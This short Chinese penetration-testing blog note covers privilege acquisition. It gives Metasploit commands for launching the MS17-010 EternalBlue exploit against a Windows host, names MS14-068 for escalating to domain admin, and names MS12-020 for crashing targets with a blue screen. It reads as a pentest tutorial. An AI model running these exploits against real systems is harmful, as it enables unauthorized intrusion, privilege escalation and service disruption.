渗透测试权限获取

渗透,最重要的是权限。

渗透是一个权限从无到有,从小到大,从少到多的过程。

从外到内:

1.外网暴漏3389端口,通过windwos的漏洞从外网渗入到内网中。

用到的MS17_010

详情参考一下连接:

https://www.cnblogs.com/backlion/p/6804863.html       (MS17_010内网渗透)

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 10.10.1.13
msf exploit(ms17_010_eternalblue) > run

 

从小到大:

1.内网,域账号提权。

① 用 MS14_068,通过本地的域控账户,利用KDC的漏洞获取到域管理员的权限。

 

② 用 MS12_020,通过DRP漏洞可以使对方蓝屏(XP,win7,2003,2008)   KB2621440

 

 

你可能感兴趣的:(渗透测试权限获取)